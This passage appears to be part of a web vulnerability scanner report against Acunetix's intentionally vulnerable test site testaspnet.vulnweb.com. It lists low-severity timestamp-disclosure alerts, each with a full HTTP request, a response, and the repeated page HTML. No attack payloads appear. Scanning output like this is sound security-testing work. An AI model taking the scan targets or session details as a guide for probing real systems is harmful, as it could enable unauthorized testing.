This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          190515149
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        3. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          190515149, which evaluates to: 1976-01-15 08:52:29

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Content-Length: 6543
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6543 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=[base64 view state omitted]&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=[base64 value omitted]
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 22723
          
          
          Response body (22723 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+Ak/h9oIkGZGh4+qj2I+T7ihtiWg==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          190515149
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        4. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          190515149, which evaluates to: 1976-01-15 08:52:29

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Content-Length: 6567
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6567 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 22784
          
          
          Response body (22784 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
